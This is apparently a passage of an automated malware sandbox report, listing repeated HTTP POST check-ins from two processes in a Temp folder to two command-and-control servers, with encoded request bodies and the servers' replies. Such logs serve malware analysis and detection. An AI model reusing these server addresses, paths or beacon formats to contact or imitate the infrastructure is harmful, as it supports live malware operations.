                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:49.714169025 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      621192.168.2.550467193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:49.838929892 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:50.097141981 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      622192.168.2.550468193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:50.067667007 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:50.311331987 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      623192.168.2.550469193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:50.461823940 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:50.709302902 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      624192.168.2.550470193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:50.565610886 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:50.821535110 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      625192.168.2.550471193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:50.956634998 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:51.205957890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      626192.168.2.550472193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:51.184535027 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:51.435743093 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      627192.168.2.550473193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:51.560429096 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:51.804146051 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      628192.168.2.550474193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:51.685703993 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:51.935503960 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      629192.168.2.550475193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:52.051920891 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:52.301539898 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      630192.168.2.550476193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:52.288124084 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:52.533689976 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      631192.168.2.550477193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:52.660840034 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:52.905416965 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      632192.168.2.550478193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:52.789391041 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:53.045710087 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      633192.168.2.550479193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:53.155658960 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:53.404165983 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      634192.168.2.550480193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:53.395032883 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:53.637655973 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      635192.168.2.550481193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:53.756688118 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.003565073 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      636192.168.2.550482193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:53.887229919 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
